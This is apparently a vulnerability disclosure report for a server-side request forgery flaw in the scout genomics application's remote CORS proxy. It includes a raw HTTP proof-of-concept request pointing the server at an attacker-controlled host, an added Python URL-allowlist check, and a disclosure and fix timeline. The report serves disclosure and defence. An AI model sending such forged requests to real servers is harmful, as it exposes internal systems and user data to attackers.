Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022


Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Impact

An attacker could make the application perform arbitrary requests for phishing, stealing cookies, making requests to private areas, or leading to XSS...
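
One way to constrain a proxy route of the `/remote/cors/<url>` kind before the server fetches anything, as an added example (not code from the scout project or its v4.42 fix). `ALLOWED_HOSTS`, `check_remote_url`, the host names and the resolver data are assumptions constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: the only hosts this proxy should ever fetch from (hypothetical names).
ALLOWED_HOSTS = {"igv.example.org", "tracks.example.org"}


def _resolve(host):
    """Return every address the host name currently resolves to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def check_remote_url(url, allowed_hosts=ALLOWED_HOSTS, resolve=_resolve):
    """Return (ok, reason) for a user-supplied URL before the server fetches it."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False, "host not on allowlist"
    try:
        addresses = resolve(host)
    except OSError:
        return False, "host does not resolve"
    # An allowlisted name can still point inward; reject anything non-public.
    for addr in addresses:
        if not ipaddress.ip_address(addr.split("%")[0]).is_global:
            return False, "resolves to non-public address"
    return (True, "ok") if addresses else (False, "host does not resolve")


if __name__ == "__main__":
    # Constructed resolver and URLs so the demo runs offline.
    fake_dns = {"igv.example.org": ["93.184.216.34"], "tracks.example.org": ["10.0.0.5"]}
    for url in ("http://203.0.113.7:8888",  # same shape as the PoC target
                "https://igv.example.org/hg38/genes.bed",
                "https://tracks.example.org/a.bam",
                "ftp://igv.example.org/x"):
        print(url, check_remote_url(url, resolve=fake_dns.__getitem__))
```

The check resolves the name separately from the later fetch, so the fetch itself should not follow redirects and should connect to the address that was checked.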

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back a year ago
Chiara Rasi validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chiara Rasi marked this as fixed in v4.42 with commit b0ef15 a year ago
Chiara Rasi has been awarded the fix bounty
This vulnerability will not receive a CVE
Nhien.IT
a year ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? If you can, I hope @admin can help.

Jamie Slome
a year ago

Admin


Sorted 👍
